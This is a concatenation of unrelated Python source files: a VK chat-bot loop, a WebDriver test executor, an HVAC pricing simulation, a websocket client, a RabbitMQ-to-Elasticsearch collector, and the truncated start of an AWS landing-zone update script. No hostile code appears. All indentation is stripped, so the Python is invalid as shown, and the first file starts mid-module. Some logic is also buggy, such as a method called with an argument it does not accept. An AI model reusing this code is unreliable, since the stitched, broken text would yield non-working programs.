apiViews = []
apiIDs = []
def parseStuff(userId, event):
print(json.dumps(event['object']))
if event['object']['from_id'] >= 0:
for view in views:
if view.vkID == userId:
if view.ParseEvent(event['object']) == True:
views.remove(view)
userIds.remove(view.vkID)
break
else:
# TODO: parse bots conversation
pass
def parseAPIReq(userId, event):
for apiView in apiViews:
if apiView.vkID == userId:
if apiView.ParseEvent(event):
apiViews.remove(apiView)
apiIDs.remove(userId)
pass
def main():
try:
session = vk_api.VkApi(token= token)
lps = bot_longpoll.VkBotLongPoll(session, 192912095)
for event in lps.listen():
for view in views:
if view.vkID not in userIds:
userIds.append(view.vkID)
rawEvent = event.raw
userId = rawEvent['object']['from_id']
if event.raw['object']['from_id'] >= 0:
mV = mainView.MainView(session= session, userId= userId, event= rawEvent)
if mV.vkID not in userIds:
views.append(mV)
userIds.append(mV.vkID)
a = threading.Thread(target= parseStuff, kwargs= {'event': rawEvent, "userId": userId})
a.start()
else:
userId = rawEvent['object']['peer_id']
# apiV = APIView.APIView(session, userId)
# if apiV.vkID not in apiIDs:
# apiViews.append(apiV)
# apiIDs.append(userId)
# b = threading.Thread(target= parseAPIReq, kwargs= {'userId': userId, 'event': event})
# b.start()
pass
except Exception as e:
print(str(e))
main()
main()
|
executorwebdriver.py
|
import json
import os
import socket
import threading
import time
import traceback
import urlparse
import uuid
from .base import (CallbackHandler,
RefTestExecutor,
RefTestImplementation,
TestharnessExecutor,
extra_timeout,
strip_server)
from .protocol import (BaseProtocolPart,
TestharnessProtocolPart,
Protocol,
SelectorProtocolPart,
ClickProtocolPart,
SendKeysProtocolPart,
ActionSequenceProtocolPart,
TestDriverProtocolPart)
from ..testrunner import Stop
import webdriver as client
here = os.path.join(os.path.split(__file__)[0])
class WebDriverBaseProtocolPart(BaseProtocolPart):
def setup(self):
self.webdriver = self.parent.webdriver
def execute_script(self, script, async=False):
method = self.webdriver.execute_async_script if async else self.webdriver.execute_script
return method(script)
def set_timeout(self, timeout):
try:
self.webdriver.timeouts.script = timeout
except client.WebDriverException:
# workaround https://bugs.chromium.org/p/chromedriver/issues/detail?id=2057
body = {"type": "script", "ms": timeout * 1000}
self.webdriver.send_session_command("POST", "timeouts", body)
@property
def current_window(self):
return self.webdriver.window_handle
def set_window(self, handle):
self.webdriver.window_handle = handle
def wait(self):
while True:
try:
self.webdriver.execute_async_script("")
except (client.TimeoutException, client.ScriptTimeoutException):
pass
except (socket.timeout, client.NoSuchWindowException,
client.UnknownErrorException, IOError):
break
except Exception as e:
self.logger.error(traceback.format_exc(e))
break
class WebDriverTestharnessProtocolPart(TestharnessProtocolPart):
def setup(self):
self.webdriver = self.parent.webdriver
self.runner_handle = None
with open(os.path.join(here, "runner.js")) as f:
self.runner_script = f.read()
def load_runner(self, url_protocol):
if self.runner_handle:
self.webdriver.window_handle = self.runner_handle
url = urlparse.urljoin(self.parent.executor.server_url(url_protocol),
"/testharness_runner.html")
self.logger.debug("Loading %s" % url)
self.webdriver.url = url
self.runner_handle = self.webdriver.window_handle
format_map = {"title": threading.current_thread().name.replace("'", '"')}
self.parent.base.execute_script(self.runner_script % format_map)
def close_old_windows(self):
handles = [item for item in self.webdriver.handles if item != self.runner_handle]
for handle in handles:
try:
self.webdriver.window_handle = handle
self.webdriver.close()
except client.NoSuchWindowException:
pass
self.webdriver.window_handle = self.runner_handle
return self.runner_handle
def get_test_window(self, window_id, parent, timeout=5):
"""Find the test window amongst all the open windows.
This is assumed to be either the named window or the one after the parent in the list of
window handles
:param window_id: The DOM name of the Window
:param parent: The handle of the runner window
:param timeout: The time in seconds to wait for the window to appear. This is because in
some implementations there's a race between calling window.open and the
window being added to the list of WebDriver accessible windows."""
test_window = None
end_time = time.time() + timeout
while time.time() < end_time:
try:
# Try using the JSON serialization of the WindowProxy object,
# it's in Level 1 but nothing supports it yet
win_s = self.webdriver.execute_script("return window['%s'];" % window_id)
win_obj = json.loads(win_s)
test_window = win_obj["window-fcc6-11e5-b4f8-330a88ab9d7f"]
except Exception:
pass
if test_window is None:
after = self.webdriver.handles
if len(after) == 2:
test_window = next(iter(set(after) - set([parent])))
elif after[0] == parent and len(after) > 2:
# Hope the first one here is the test window
test_window = after[1]
if test_window is not None:
assert test_window != parent
return test_window
time.sleep(0.1)
raise Exception("unable to find test window")
class WebDriverSelectorProtocolPart(SelectorProtocolPart):
def setup(self):
self.webdriver = self.parent.webdriver
def elements_by_selector(self, selector):
return self.webdriver.find.css(selector)
class WebDriverClickProtocolPart(ClickProtocolPart):
def setup(self):
self.webdriver = self.parent.webdriver
def element(self, element):
self.logger.info("click " + repr(element))
return element.click()
class WebDriverSendKeysProtocolPart(SendKeysProtocolPart):
def setup(self):
self.webdriver = self.parent.webdriver
def send_keys(self, element, keys):
try:
return element.send_keys(keys)
except client.UnknownErrorException as e:
# workaround https://bugs.chromium.org/p/chromedriver/issues/detail?id=1999
if (e.http_status != 500 or
e.status_code != "unknown error"):
raise
return element.send_element_command("POST", "value", {"value": list(keys)})
class WebDriverActionSequenceProtocolPart(ActionSequenceProtocolPart):
def setup(self):
self.webdriver = self.parent.webdriver
def send_actions(self, actions):
self.webdriver.actions.perform(actions['actions'])
class WebDriverTestDriverProtocolPart(TestDriverProtocolPart):
def setup(self):
self.webdriver = self.parent.webdriver
def send_message(self, message_type, status, message=None):
obj = {
"type": "testdriver-%s" % str(message_type),
"status": str(status)
}
if message:
obj["message"] = str(message)
self.webdriver.execute_script("window.postMessage(%s, '*')" % json.dumps(obj))
class WebDriverProtocol(Protocol):
implements = [WebDriverBaseProtocolPart,
WebDriverTestharnessProtocolPart,
WebDriverSelectorProtocolPart,
WebDriverClickProtocolPart,
WebDriverSendKeysProtocolPart,
WebDriverActionSequenceProtocolPart,
WebDriverTestDriverProtocolPart]
def __init__(self, executor, browser, capabilities, **kwargs):
super(WebDriverProtocol, self).__init__(executor, browser)
self.capabilities = capabilities
self.url = browser.webdriver_url
self.webdriver = None
def connect(self):
"""Connect to browser via WebDriver."""
self.logger.debug("Connecting to WebDriver on URL: %s" % self.url)
host, port = self.url.split(":")[1].strip("/"), self.url.split(':')[-1].strip("/")
capabilities = {"alwaysMatch": self.capabilities}
self.webdriver = client.Session(host, port, capabilities=capabilities)
self.webdriver.start()
def after_conect(self):
pass
def teardown(self):
self.logger.debug("Hanging up on WebDriver session")
try:
self.webdriver.quit()
except Exception:
pass
del self.webdriver
def is_alive(self):
try:
# Get a simple property over the connection
self.webdriver.window_handle
except (socket.timeout, client.UnknownErrorException):
return False
return True
def after_connect(self):
self.testharness.load_runner(self.executor.last_environment["protocol"])
class WebDriverRun(object):
def __init__(self, func, protocol, url, timeout):
self.func = func
self.result = None
self.protocol = protocol
self.url = url
self.timeout = timeout
self.result_flag = threading.Event()
def run(self):
timeout = self.timeout
try:
self.protocol.base.set_timeout((timeout + extra_timeout))
except client.UnknownErrorException:
self.logger.error("Lost WebDriver connection")
return Stop
executor = threading.Thread(target=self._run)
executor.start()
flag = self.result_flag.wait(timeout + 2 * extra_timeout)
if self.result is None:
if flag:
# flag is True unless we timeout; this *shouldn't* happen, but
# it can if self._run fails to set self.result due to raising
self.result = False, ("INTERNAL-ERROR", "self._run didn't set a result")
else:
self.result = False, ("EXTERNAL-TIMEOUT", None)
return self.result
def _run(self):
try:
self.result = True, self.func(self.protocol, self.url, self.timeout)
except (client.TimeoutException, client.ScriptTimeoutException):
self.result = False, ("EXTERNAL-TIMEOUT", None)
except (socket.timeout, client.UnknownErrorException):
self.result = False, ("CRASH", None)
except Exception as e:
if (isinstance(e, client.WebDriverException) and
e.http_status == 408 and
e.status_code == "asynchronous script timeout"):
# workaround for https://bugs.chromium.org/p/chromedriver/issues/detail?id=2001
self.result = False, ("EXTERNAL-TIMEOUT", None)
else:
message = str(getattr(e, "message", ""))
if message:
message += "\n"
message += traceback.format_exc(e)
self.result = False, ("INTERNAL-ERROR", message)
finally:
self.result_flag.set()
class WebDriverTestharnessExecutor(TestharnessExecutor):
supports_testdriver = True
def __init__(self, browser, server_config, timeout_multiplier=1,
close_after_done=True, capabilities=None, debug_info=None,
supports_eager_pageload=True, **kwargs):
"""WebDriver-based executor for testharness.js tests"""
TestharnessExecutor.__init__(self, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.protocol = WebDriverProtocol(self, browser, capabilities)
with open(os.path.join(here, "testharness_webdriver_resume.js")) as f:
self.script_resume = f.read()
self.close_after_done = close_after_done
self.window_id = str(uuid.uuid4())
self.supports_eager_pageload = supports_eager_pageload
def is_alive(self):
return self.protocol.is_alive()
def on_environment_change(self, new_environment):
if new_environment["protocol"] != self.last_environment["protocol"]:
self.protocol.testharness.load_runner(new_environment["protocol"])
def do_test(self, test):
url = self.test_url(test)
success, data = WebDriverRun(self.do_testharness,
self.protocol,
url,
test.timeout * self.timeout_multiplier).run()
if success:
return self.convert_result(test, data)
return (test.result_cls(*data), [])
def do_testharness(self, protocol, url, timeout):
format_map = {"url": strip_server(url)}
parent_window = protocol.testharness.close_old_windows()
# Now start the test harness
protocol.base.execute_script("window.open('about:blank', '%s', 'noopener')" % self.window_id)
test_window = protocol.testharness.get_test_window(self.window_id,
parent_window,
timeout=5*self.timeout_multiplier)
self.protocol.base.set_window(test_window)
handler = CallbackHandler(self.logger, protocol, test_window)
protocol.webdriver.url = url
if not self.supports_eager_pageload:
self.wait_for_load(protocol)
while True:
result = protocol.base.execute_script(
self.script_resume % format_map, async=True)
done, rv = handler(result)
if done:
break
return rv
def wait_for_load(self, protocol):
# pageLoadStrategy=eager doesn't work in Chrome so try to emulate in user script
loaded = False
seen_error = False
while not loaded:
try:
loaded = protocol.base.execute_script("""
var callback = arguments[arguments.length - 1];
if (location.href === "about:blank") {
callback(false);
} else if (document.readyState !== "loading") {
callback(true);
} else {
document.addEventListener("readystatechange", () => {if (document.readyState !== "loading") {callback(true)}});
}""", async=True)
except client.JavascriptErrorException:
# We can get an error here if the script runs in the initial about:blank
# document before it has navigated, with the driver returning an error
# indicating that the document was unloaded
if seen_error:
raise
seen_error = True
class WebDriverRefTestExecutor(RefTestExecutor):
def __init__(self, browser, server_config, timeout_multiplier=1,
screenshot_cache=None, close_after_done=True,
debug_info=None, capabilities=None, **kwargs):
"""WebDriver-based executor for reftests"""
RefTestExecutor.__init__(self,
browser,
server_config,
screenshot_cache=screenshot_cache,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.protocol = WebDriverProtocol(self, browser,
capabilities=capabilities)
self.implementation = RefTestImplementation(self)
self.close_after_done = close_after_done
self.has_window = False
with open(os.path.join(here, "reftest.js")) as f:
self.script = f.read()
with open(os.path.join(here, "reftest-wait_webdriver.js")) as f:
self.wait_script = f.read()
def is_alive(self):
return self.protocol.is_alive()
def do_test(self, test):
self.protocol.webdriver.window.size = (600, 600)
result = self.implementation.run_test(test)
return self.convert_result(test, result)
def screenshot(self, test, viewport_size, dpi):
# https://github.com/w3c/wptrunner/issues/166
assert viewport_size is None
assert dpi is None
return WebDriverRun(self._screenshot,
self.protocol,
self.test_url(test),
test.timeout).run()
def _screenshot(self, protocol, url, timeout):
webdriver = protocol.webdriver
webdriver.url = url
webdriver.execute_async_script(self.wait_script)
screenshot = webdriver.screenshot()
# strip off the data:img/png, part of the url
if screenshot.startswith("data:image/png;base64,"):
screenshot = screenshot.split(",", 1)[1]
return screenshot
|
HVAC2.py
|
"""
Run a large number of simulations for the HVAC model.
Results from these simulations are reported in:
C. Campaigne, M. Balandat and L. Ratliff: Welfare Effects
of Dynamic Electricity Pricing. In preparation.
@author: Maximilian Balandat
@date Sep 23, 2017
"""
# import packages and set up things
import os
import multiprocessing as mp
import pandas as pd
import logging
import logging.handlers
import logging.config
from datetime import datetime
from pyDR.simulation import get_internal_gains, log_config, simulate_HVAC, max_cool
############################################################################
# Setup
DATA_PATH = "PATH_TO_PYDR_DATA"
LOG_PATH = "PATH_TO_LOGS"
RESULTS_PATH = "PATH_TO_RESULTS"
# location of data files (available for download at
# https://www.ocf.berkeley.edu/~balandat/pyDR_data.zip)
data_file = os.path.join(DATA_PATH, "data_complete.csv")
# location of the log file
log_file = os.path.join(LOG_PATH, "HVAC_sim.log")
# directory for GUROBI log files
GRB_logdir = os.path.join(LOG_PATH, "GRB_logs")
# location of the result file
result_file = os.path.join(RESULTS_PATH, "results.csv")
# folder for output files (Attention: If not none then this will
# save a few GB of .pickle files)
output_folder = None
############################################################################
# read in data
data = pd.read_csv(data_file, parse_dates=['timestamp_GMT'],
index_col='timestamp_GMT').tz_convert('GMT')
data = data.resample('1H').mean()
# Define model and simulation parameters
# generate copies of input data for parallelization
sim_ranges = [[datetime(2012, 1, 1), datetime(2012, 12, 31)],
[datetime(2013, 1, 1), datetime(2013, 12, 31)],
[datetime(2014, 1, 1), datetime(2014, 12, 31)]]
sim_tariffs = ['Zero', 'OptFlat', 'A1', 'A1TOU', 'A6TOU', 'A10_secondary',
'A10TOU_secondary', 'E19TOU_secondary']
sim_nodes = ['PGCC', 'PGEB', 'PGF1', 'PGP2', 'PGSA']
n_DR = [75]
n_ranges = len(sim_ranges)
# generate scaled sub-DataFrame
data_sim = pd.concat(
[data[[node+'_temp']] for node in sim_nodes] +
[data[[node+'_solar']] for node in sim_nodes] +
[data[[node+'_LMP']] for node in sim_nodes] +
[get_internal_gains(data.index)], axis=1)
# generate a list of DataFrames of different ranges for parallelization
data_par = []
for (start_date, end_date) in sim_ranges:
ts_start = pd.Timestamp(start_date, tz='US/Pacific')
ts_end = pd.Timestamp(end_date, tz='US/Pacific')
data_par.append(
data_sim[(data_sim.index >= ts_start) & (data_sim.index <= ts_end)]
)
# configure logger
logging.config.dictConfig(log_config(log_file))
log_queue = mp.Queue(-1)
root = logging.getLogger()
ql = logging.handlers.QueueListener(log_queue, *root.handlers)
# start root logging via queue listener
ql.start()
root.log(logging.INFO, 'Starting simulation.')
results = []
# start simulating
with mp.Manager() as mngr:
result_queue = mngr.Queue(-1)
sim_workers = []
for i in range(n_ranges):
sim_worker = mp.Process(
target=simulate_HVAC, name='sim_worker {}'.format(i),
args=(i, log_queue, result_queue, data_par[i],
sim_nodes, sim_tariffs, n_DR),
kwargs={'GRB_logfile': GRB_logdir + 'GRB_{}.log'.format(i),
'expMA': False, 'carbon': True, 'MIPGap': 1e-6,
'TimeLimit': 2000, 'output_folder': output_folder,
'max_cool': max_cool})
sim_workers.append(sim_worker)
sim_worker.start()
# wait for all worker processes to finish
for sw in sim_workers:
sw.join()
root.log(logging.DEBUG, 'Extracting results.')
# extract results
for i in range(n_ranges):
results.append(result_queue.get())
# save results
root.log(logging.DEBUG, 'Saving results to disk.')
results = pd.concat(results, ignore_index=True)
results.to_csv(result_file, index=False)
# stop logging
root.log(logging.INFO, 'Simulation completed.')
ql.stop()
|
client.py
|
from . import log
logger = log.get(__name__)
from .utils import delay
import websocket
import json
import threading
from . import environment
class Client():
def __init__(self, handler):
logger.info('Constructing.')
self._handler = handler
self.ws = None
self.isClosed = False
websocket.enableTrace(False)
self._connect()
def close(self):
self.isClosed = True
if self.ws is not None:
self.ws.close()
def _connect(self):
if self.ws is not None:
return
if self.isClosed:
return
url = environment.get('BERLIOZ_AGENT_PATH')
logger.info('Connecting to agent %s...', url)
ws = websocket.WebSocketApp(url,
on_message = self._onMessage,
on_error = self._onError,
on_close = self._onClose)
ws.on_open = self._onOpen
ws_thread = threading.Thread(target=ws.run_forever)
ws_thread.daemon = True
self.ws = ws
ws_thread.start()
def _onMessage(self, ws, message):
if not ws is self.ws:
return
logger.info('Message received.')
logger.debug('Message RAW contents: %s', message)
data = json.loads(message)
logger.debug('Message JSON Contents: %s', data)
self._handler(data)
logger.info('Message processed.')
def _onError(self, ws, error):
logger.error('Error')
logger.error(error)
ws.close()
def _onClose(self, ws):
logger.info('Closed')
self.ws = None
self._reconnect()
def _onOpen(self, ws):
logger.info('Opened')
def _reconnect(self):
if self.isClosed:
return
delay(1000, self._connect)
|
collector.py
|
import socket
import threading
from threading import Thread
import time
import os
import sys
import stomp
import traceback
from elasticsearch import Elasticsearch, exceptions as es_exceptions
from elasticsearch import helpers
from datetime import datetime
import urllib3.exceptions
import hashlib
try:
import queue
except ImportError:
import Queue as queue
import siteMapping
class Collector(object):
class MyListener(object):
def __init__(self, q, collector):
self.q = q
self.collector = collector
def on_message(self, headers, message):
self.q.put([message, headers])
def on_error(self, headers, message):
print('received an error %s' % message)
os._exit(1)
def on_heartbeat_timeout(self):
print('AMQ - lost heartbeat. Needs a reconnect!')
self.collector.connect_to_MQ(reset=True)
def on_disconnected(self):
print('AMQ - no connection. Needs a reconnect!')
self.collector.connect_to_MQ(reset=True)
def __init__(self):
siteMapping.reload()
# MQ connection
self.connection = None
self.q = queue.Queue()
self.RMQ_parameters = self.get_RMQ_connection_parameters()
self.es_index_prefix = os.environ.get("ES_INDEX_PREFIX", "")
self.aLotOfData = []
self.last_flush = time.time()
self.last_headers = None
self.es_conn = None
self.msg_counter = 0
def start(self):
# start eventCreator threads
self.t = Thread(target=self.watchMessages)
self.t.daemon = True
self.t.start()
while True:
self.connect_to_MQ()
time.sleep(55)
print(datetime.now().strftime("%Y-%m-%d %H:%M:%S"), "threads:", threading.active_count(), "qsize:", self.q.qsize())
def watchMessages(self):
"""
Managing creating and sending messages
"""
while True:
try:
(msg, headers) = self.q.get(timeout=10)
self.msg_counter += 1
except queue.Empty as qe:
# Try to flush the data
self.flushData()
continue
try:
self.eventCreator(msg)
except Exception as e:
# Failed to create the event
traceback.print_exc()
print("Failed to parse data:")
print(str(msg))
# Set the last successful headers
self.last_headers = headers
self.flushData()
self.q.task_done()
def flushData(self):
"""
Flush the data, if it's time
"""
if self.aLotOfData is None or len(self.aLotOfData) == 0:
if self.msg_counter > 100 or (time.time() - self.last_flush) > 10:
if self.last_headers:
self.connection.ack(self.last_headers['message-id'], self.RMQ_parameters['RMQ_ID'])
self.last_headers = None
self.last_flush = time.time()
self.msg_counter = 0
return
if len(self.aLotOfData) > 100 or (time.time() - self.last_flush) > 10 or self.msg_counter > 100:
success = False
while not success:
success = self.bulk_index(self.aLotOfData, es_conn=None, thread_name=threading.current_thread().name)
if success is True:
self.aLotOfData = []
if self.last_headers:
self.connection.ack(self.last_headers['message-id'], self.RMQ_parameters['RMQ_ID'])
self.last_headers = None
self.last_flush = time.time()
self.msg_counter = 0
break
else:
print("Unable to post to ES")
time.sleep(10)
def eventCreator(self):
pass
def connect_to_MQ(self, reset=False):
if self.connection is not None:
if reset and self.connection.is_connected():
self.connection.disconnect()
self.connection = None
if self.connection.is_connected():
return
print("connecting to MQ")
self.connection = None
addresses = socket.getaddrinfo('clever-turkey.rmq.cloudamqp.com', 61614)
ip = addresses[0][4][0]
host_and_ports = [(ip, 61614)]
print(host_and_ports)
self.connection = stomp.Connection(
host_and_ports=host_and_ports,
use_ssl=True,
vhost=self.RMQ_parameters['RMQ_VHOST']
)
self.connection.set_listener('MyConsumer', Collector.MyListener(self.q, self))
self.connection.connect(self.RMQ_parameters['RMQ_USER'], self.RMQ_parameters['RMQ_PASS'], wait=True, heartbeats=(10000, 10000))
self.connection.subscribe(destination=self.TOPIC, ack='client', id=self.RMQ_parameters['RMQ_ID'], headers={"durable": True, "auto-delete": False, 'prefetch-count': 1024})
def get_es_connection(self):
"""
establishes es connection.
"""
print("make sure we are connected to ES...")
while True:
try:
es_host = None
http_auth = None
if 'ES_HOST' in os.environ:
es_host = os.environ["ES_HOST"]
else:
es_host = "atlas-kibana.mwt2.org:9200"
if 'ES_USER' in os.environ and 'ES_PASS' in os.environ:
http_auth = (os.environ['ES_USER'], os.environ['ES_PASS'])
self.es_conn = Elasticsearch([es_host], http_auth=http_auth)
else:
self.es_conn = Elasticsearch([es_host])
print("connected OK!")
except es_exceptions.ConnectionError as error:
print('ConnectionError in get_es_connection: ', error)
except:
print('Something seriously wrong happened in getting ES connection.')
else:
return self.es_conn
time.sleep(70)
def bulk_index(self, data, es_conn=None, thread_name=''):
"""
sends the data to ES for indexing.
if successful returns True.
"""
success = False
if self.es_conn is None:
self.es_conn = self.get_es_connection()
try:
res = helpers.bulk(self.es_conn, data, raise_on_exception=True, request_timeout=120)
print(thread_name, "inserted:", res[0], 'errors:', res[1])
success = True
except es_exceptions.ConnectionError as error:
print('ConnectionError ', error)
except es_exceptions.TransportError as error:
print('TransportError ', error)
except helpers.BulkIndexError as error:
print(error)
except Exception as e:
traceback.print_exc()
print('Something seriously wrong happened.')
# Reset the ES connection
self.es_conn = None
return success
def get_RMQ_connection_parameters(self):
""" read vhost, user, pass from the environment """
ret = {'RMQ_VHOST': '', 'RMQ_USER': '', 'RMQ_PASS': '', 'RMQ_ID': ''}
for var in ret:
val = os.environ[var]
if val:
ret[var] = val
else:
print('environment variable', var, 'not defined. Exiting.')
sys.exit(1)
return ret
def calculateId(self, message, timestamp):
"""
Calculate the Id from the message and return it.
Version 1 (or no version):
- timestamp
- org_metadata_key
Version 2:
- timestamp
- source
- dest
- test type
"""
if 'version' in message and message['version'] == 2: # Should we use a semvar library?
sha1_hash = hashlib.sha1()
sha1_hash.update(message['meta']['source'].encode('utf-8'))
sha1_hash.update(message['meta']['destination'].encode('utf-8'))
sha1_hash.update(self.TOPIC.encode('utf-8'))
sha1_hash.update(str(timestamp).encode('utf-8'))
return sha1_hash.hexdigest()
else:
sha1_hash = hashlib.sha1()
sha1_hash.update(message['meta']['org_metadata_key'].encode())
sha1_hash.update(str(timestamp).encode())
return sha1_hash.hexdigest()
|
EC-Update-LZ.py
|
#!/usr/bin/python
import sys, getopt
import subprocess, pkg_resources
import os
import subprocess
import shlex
import logging
import time
import boto3
import json
import zipfile
import threading
import cursor
import yaml
from cfn_tools import load_yaml, dump_yaml
from zipfile import ZipFile
from datetime import datetime
from enum import Enum
from colorama import Fore, Back, Style
from botocore.exceptions import BotoCoreError, ClientError, ProfileNotFound
from botocore.config import Config
account_id = ''
stacks = { 'SECLZ-Cloudtrail-KMS' : { 'Template' : 'CFN/EC-lz-Cloudtrail-kms-key.yml' } ,
'SECLZ-LogShipper-Lambdas-Bucket' : { 'Template' : 'CFN/EC-lz-s3-bucket-lambda-code.yml' } ,
'SECLZ-LogShipper-Lambdas' : { 'Template' : 'CFN/EC-lz-logshipper-lambdas.yml' } ,
'SECLZ-Central-Buckets' : { 'Template' : 'CFN/EC-lz-s3-buckets.yml'} ,
'SECLZ-Iam-Password-Policy' : { 'Template' : 'CFN/EC-lz-iam-setting_password_policy.yml', 'Linked':True } ,
'SECLZ-config-cloudtrail-SNS' : { 'Template' : 'CFN/EC-lz-config-cloudtrail-logging.yml', 'Linked':True } ,
'SECLZ-Guardduty-detector' : { 'Template' : 'CFN/EC-lz-guardDuty-detector.yml', 'Linked':True } ,
'SECLZ-SecurityHub' : { 'Template' : 'CFN/EC-lz-securityHub.yml', 'Linked':True } ,
'SECLZ-Notifications-Cloudtrail' : { 'Template' : 'CFN/EC-lz-notifications.yml', 'Linked':True } ,
'SECLZ-CloudwatchLogs-SecurityHub' : { 'Template' : 'CFN/EC-lz-config-securityhub-logging.yml' } ,
'SECLZ-local-SNS-topic' : { 'Template' : 'CFN/EC-lz-local-config-SNS.yml', 'Linked':True} }
stacksets = { 'SECLZ-Enable-Config-SecurityHub-Globally' : { 'Template' : 'CFN/EC-lz-Config-SecurityHub-all-regions.yml' } ,
'SECLZ-Enable-Guardduty-Globally' : { 'Template' : 'CFN/EC-lz-Config-Guardduty-all-regions.yml' } }
tags = []
all_regions = ["ap-northeast-1","ap-northeast-2","ap-northeast-3","ap-south-1","ap-southeast-1","ap-southeast-2","ca-central-1","eu-central-1","eu-north-1","eu-west-1", "eu-west-2","eu-west-3","sa-east-1","us-east-1","us-east-2","us-west-1","us-west-2"]
def main(argv):
global tags
start_time = time.time()
manifest = ''
profile = ''
org_account='246933597933'
has_profile = False
verbosity = logging.ERROR
ssm_actions = []
stack_actions = []
securityhub_actions = []
stacksets_actions = []
cis_actions = []
version=None
boto3_config = Config(
retries = dict(
max_attempts = 10
)
)
sys.stdout = Unbuffered(sys.stdout)
try:
opts, args = getopt.getopt(argv,"hvm:s:o:",["manifest", "seclog", "org", "verbose"])
except getopt.GetoptError:
usage()
sys.exit(2)
print("#######")
print("####### AWS Landing Zone update script")
print("")
# Parsing script parameters
for opt, arg in opts:
if opt == '-h':
usage()
sys.exit()
elif opt in ("-m", "--manifest"):
if (arg == ''):
print(f"Manifest has not been provided. [{Status.FAIL.value}]")
print("Exiting...")
sys.exit(1)
else:
try:
with open(arg) as f:
manifest = json.load(f)
except FileNotFoundError as err:
print(f"Manifest file not found : {err.strerror} [{Status.FAIL.value}]")
print("Exiting...")
sys.exit(1)
except AttributeError:
print("fManifest file {arg} is not a valid json [{Status.FAIL.value}]")
print("Exiting...")
sys.exit(1)
elif opt in ("-o", "--org"):
print(f"Using Organization account : {arg}")
org_account = arg
elif opt in ("-s", "--seclog"):
profiles = arg.split(',')
has_profile = True
if len(profiles) > 1:
print(f"Multiple AWS profiles delected : {profiles}")
elif opt in ("-v", "--verbose"):
verbosity = logging.DEBUG
try:
with open('CFN/EC-lz-TAGS.json') as f:
tags = json.load(f)
except FileNotFoundError as err:
print(f"Tag file not found : {err.strerror} [{Status.FAIL.value}]")
print("Exiting...")
sys.exit(1)
except AttributeError:
print(f"Manifest file {arg} is not a valid json [{Status.FAIL.value}]")
print("Exiting...")
sys.exit(1)
if 'tags' in manifest:
tags = merge_tags(tags, manifest['tags'])
logging.basicConfig(level=verbosity)
p = 0
loop = True
while loop:
if has_profile:
if p < len(profiles):
profile = profiles[p]
p=p+1
try:
print(f"Using AWS profile : {profile}")
boto3.setup_default_session(profile_name=profile)
get_account_id(True)
except ProfileNotFound as err:
print(f"{err} [{Status.FAIL.value}]")
print("Exiting...")
sys.exit(1)
else:
break
else:
loop = False
if (is_seclog() == False):
print(f"Not a SECLOG account. [{Status.FAIL.value}]")
print("Exiting...")
sys.exit(1)
print(f"SECLOG account identified. [{Status.OK.value}]")
print("")
linked_accounts = get_linked_accounts()
if not null_empty(manifest, 'stacks'):
stack_actions = manifest['stacks']
if not null_empty(manifest, 'version'):
version = manifest['version']
if not null_empty(manifest, 'stacksets'):
stacksets_actions = manifest['stacksets']
if not null_empty(manifest, 'ssm'):
ssm_actions = manifest['ssm']
if not null_empty(manifest, 'cis'):
all_regions = manifest['regions']
cis_actions = manifest['cis']
if not null_empty(manifest, 'regions'):
all_regions = manifest['regions']
if not null_empty(manifest, 'accounts'):
accounts = manifest['accounts']
if not null_empty(manifest, 'securityhub'):
securityhub_actions = manifest['securityhub']
seclog_status = Execution.NO_ACTION
#update seclog stacks
if len(accounts['exclude']) > 0 and account_id in accounts['exclude']:
print(f"Skipping SECLOG account {account_id}")
else:
print(f"Updating SECLOG account {account_id}")
print("")
if ssm_actions:
cfnssm = boto3.client('ssm')
#update SSM parameters
if do_update(ssm_actions, 'seclog-ou') and seclog_status != Execution.FAIL:
result=update_ssm_parameter(cfnssm, '/org/member/SecLogOU', ssm_actions['seclog-ou']['value'])
if result != Execution.OK:
will_update(stack_actions,'SECLZ-config-cloudtrail-SNS')
if result == Execution.NO_ACTION:
seclog_status = result
#add tags
if 'tags' in ssm_actions['seclog-ou'] and ssm_actions['seclog-ou']['tags'] == True:
seclog_status = add_tags_parameter(cfnssm, '/org/member/SecLogOU')
if do_update(ssm_actions, 'notification-mail') and seclog_status != Execution.FAIL:
result=update_ssm_parameter(cfnssm, '/org/member/SecLog_notification-mail', ssm_actions['notification-mail']['value'])
if result == Execution.OK:
will_update(stack_actions,'SECLZ-config-cloudtrail-SNS')
if result != Execution.NO_ACTION:
seclog_status = result
#add tags
if 'tags' in ssm_actions['notification-mail'] and ssm_actions['notification-mail']['tags'] == True:
seclog_status = add_tags_parameter(cfnssm, '/org/member/SecLog_notification-mail')
if do_update(ssm_actions, 'cloudtrail-groupname') and seclog_status != Execution.FAIL:
result=update_ssm_parameter(cfnssm, '/org/member/SecLog_cloudtrail-groupname', ssm_actions['cloudtrail-groupname']['value'])
if result == Execution.OK:
will_update(stack_actions,'SECLZ-config-cloudtrail-SNS')
will_update(stack_actions,'SECLZ-LogShipper-Lambdas')
will_update(stack_actions,'SECLZ-Notifications-Cloudtrail')
if result != Execution.NO_ACTION:
seclog_status = result
#add tags
if 'tags' in ssm_actions['cloudtrail-groupname'] and ssm_actions['cloudtrail-groupname']['tags'] == True:
seclog_status = add_tags_parameter(cfnssm, '/org/member/SecLog_cloudtrail-groupname')
if do_update(ssm_actions, 'insight-groupname') and seclog_status != Execution.FAIL:
result=update_ssm_parameter(cfnssm, '/org/member/SecLog_insight-groupname', ssm_actions['insight-groupname']['value'])
if result != Execution.OK:
will_update(stack_actions,'SECLZ-config-cloudtrail-SNS')
will_update(stack_actions,'SECLZ-LogShipper-Lambdas')
if result == Execution.NO_ACTION:
seclog_status = result
#add tags
if 'tags' in ssm_actions['insight-groupname'] and ssm_actions['insight-groupname']['tags'] == True:
seclog_status = add_tags_parameter(cfnssm, '/org/member/SecLog_insight-groupname')
if do_update(ssm_actions, 'guardduty-groupname') and seclog_status != Execution.FAIL:
for reg in all_regions:
cfnssm = boto3.client('ssm', region_name=reg)
result=update_ssm_parameter(cfnssm, '/org/member/SecLog_guardduty-groupname', ssm_actions['guardduty-groupname']['value'], reg)
if result == Execution.OK:
will_update(stack_actions,'SECLZ-Guardduty-detector')
will_update(stacksets_actions,'SECLZ-Enable-Guardduty-Globally')
if result != Execution.NO_ACTION:
seclog_status = result
cfnssm = boto3.client('ssm')
#add tags
if 'tags' in ssm_actions['guardduty-groupname'] and ssm_actions['seclog-ou']['tags'] == True:
for reg in all_regions:
cfnssm = boto3.client('ssm', region_name=reg)
